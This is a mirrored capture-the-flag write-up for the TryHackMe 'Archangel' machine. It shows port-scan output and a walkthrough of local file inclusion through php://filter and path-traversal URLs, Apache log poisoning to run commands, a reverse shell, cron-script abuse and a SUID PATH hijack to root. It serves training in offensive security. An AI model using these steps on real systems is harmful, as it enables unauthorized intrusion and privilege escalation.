Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-09-20 14:21:55 +00:00
Code Issues Projects Releases Packages Wiki Activity
CTF-Writeups/TryHackMe/Archangel.md
ARZ 846f799f0c
Add files via upload
2021-02-19 00:56:38 +05:00

8.3 KiB
Raw Blame History

TryHackMe-Archangel

Rustscan

rustscan -a 10.10.53.100 -- -A -sC -sV                                                     
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.                                                                                            
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |                                                                                            
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |                                                                                            
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'                                                                                            
The Modern Day Port Scanner.                                                                                                                        
________________________________________                                                                                                            
: https://discord.gg/GFrQsGy           :                                                                                                            
: https://github.com/RustScan/RustScan :                                                                                                            
 --------------------------------------                                                                                                             
😵 https://admin.tryhackme.com                                                    
[~] The config file is expected to be at "/root/.rustscan.toml"                                                                                     
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers                                 
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.          
Open 10.10.53.100:22                                                                            
Open 10.10.53.100:80                                                                                                                                
[~] Starting Script(s)                                                                                                                              
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")               

PORT   STATE SERVICE REASON         VERSION                                                                                                         
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)                                                    
| ssh-hostkey:                                                                                                                                      
|   2048 9f:1d:2c:9d:6c:a4:0e:46:40:50:6f:ed:cf:1c:f3:8c (RSA)                                                                                      
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDPrwb4vLZ/CJqefgxZMUh3zsubjXMLrKYpP8Oy5jNSRaZynNICWMQNfcuLZ2GZbR84iEQJrNqCFcbsgD+4OPyy0TXV1biJExck3OlriDBn3g
9trxh6qcHTBKoUMM3CnEJtuaZ1ZPmmebbRGyrG03jzIow+w2updsJ3C0nkUxdSQ7FaNxwYOZ5S3X5XdLw2RXu/o130fs6qmFYYTm2qii6Ilf5EkyffeYRc8SbPpZKoEpT7TQ08VYEICier9ND408
kGERHinsVtBDkaCec3XmWXkFsOJUdW4BYVhrD3M8JBvL1kPmReOnx8Q7JX2JpGDenXNOjEBS3BIX2vjj17Qo3V                                                              
|   256 63:73:27:c7:61:04:25:6a:08:70:7a:36:b2:f2:84:0d (ECDSA)                                                                                     
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKhhd/akQ2OLPa2ogtMy7V/GEqDyDz8IZZQ+266QEHke6vdC9papydu1wlbdtMVdOPx1S6zxA4
CzyrcIwDQSiCg=                                                                                                                                      
|   256 b6:4e:d2:9c:37:85:d6:76:53:e8:c4:e0:48:1c:ae:6c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBE3FV9PrmRlGbT2XSUjGvDjlWoA/7nPoHjcCXLer12O
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:                                                           
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)           
|_http-title: Wavefire
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

PORT 80 (HTTP)

Looking at the source code we can find a domain name

So lets put this is in our /etc/hosts file

Now we need to fuzz for a page that is "under development" for that I am going to use gobuster

And we found a test.php file

On clicking the button we can see on the url there's a GET parameter being used so we can check for LFI (Local File Inclusion) vulnerability. I tired a bunch of LFI techniques like ../../../../etc/passwd but it failed.

I used this technqiue what it does is that encodes the whole page into base64.

http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/mrrobot.php

We can do this for test.php as well

http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php

We can fuzz for /etc/passwd to do that we can use wfuzz

http://mafialive.thm/test.php?view=/var/www/html/development_testing/test.php

This doesn't help as we are getting the length of the response 286 and 310 which is not /etc/passwd so we can hide that response

For getting a reverse shell we need to poison the apach2 log file but before that we need to make sure that log is being accessbile.

We can access the log by the method above

http://mafialive.thm/test.php?view=/var/www/html/development_testing./.././.././.././..///var/log/apache2/access.log

Now intercept the request through burp suite and add php GET parameter code in User-Agent

Let's try to access the page with &c=id at the end

http://mafialive.thm/test.php?view=/var/www/html/development_testing./.././.././.././..///var/log/apache2/access.log&c=id

We can at the bottom of the page that id command was executed so we can now get a reverse shell

Host a file having a reverse shell payload in it

On running the command

Now we need to give it permission to execute

Execute it

Checking cronjobs we see

We can see that this file can be written by anyone so we can write bash reverse shell to get a shell as user archangel

And we got the shell

We can see backup binary having a SUID also it belongs to root user and group , on using strings on it

We can see that it's using cp (copy command) so here PATH exploitation comes where we can create a binary with the same name having bash in it and then set PATH where that "fake" binary is stored

Now run that binary

For simplicity I made /bin/bash a SUID to run as root